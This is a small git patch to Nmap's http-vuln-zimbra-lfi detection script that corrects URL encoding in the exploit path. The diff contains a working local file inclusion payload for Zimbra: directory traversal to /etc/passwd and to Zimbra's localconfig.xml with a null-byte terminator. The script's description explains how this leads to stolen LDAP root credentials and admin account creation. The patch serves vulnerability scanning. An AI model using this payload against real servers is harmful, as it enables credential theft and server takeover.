From bf269866859558fee71fb3fab839fd58189e136b Mon Sep 17 00:00:00 2001 From: dmiller Date: Fri, 7 Feb 2014 15:54:12 +0000 Subject: [PATCH] Patch from Paul AMAR to fix http-vuln-zimbra-lfi http://seclists.org/nmap-dev/2014/q1/130 --- scripts/http-vuln-zimbra-lfi.nse | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/scripts/http-vuln-zimbra-lfi.nse b/scripts/http-vuln-zimbra-lfi.nse index 31c061cef..ca7b3127d 100644 --- a/scripts/http-vuln-zimbra-lfi.nse +++ b/scripts/http-vuln-zimbra-lfi.nse @@ -66,7 +66,7 @@ action = function(host, port) state = vulns.STATE.NOT_VULN, -- default description = [[ This script exploits a Local File Inclusion in -/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz +/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz which allows us to see any file on the filesystem, including config files that contain LDAP root credentials, allowing us to make requests in /service/admin/soap API with the stolen LDAP credentials to create user @@ -87,8 +87,8 @@ This issue was patched in Zimbra 7.2.6. local file_long = "../../../../../../../../../etc/passwd" --local file_long = "../../../../../../../../../opt/zimbra/conf/localconfig.xml" - local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00" - local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00" + local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00" + local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00" stdnse.print_debug(1, "Trying to detect if the server is vulnerable") stdnse.print_debug(1, "GET " .. uri .. escape(url_short))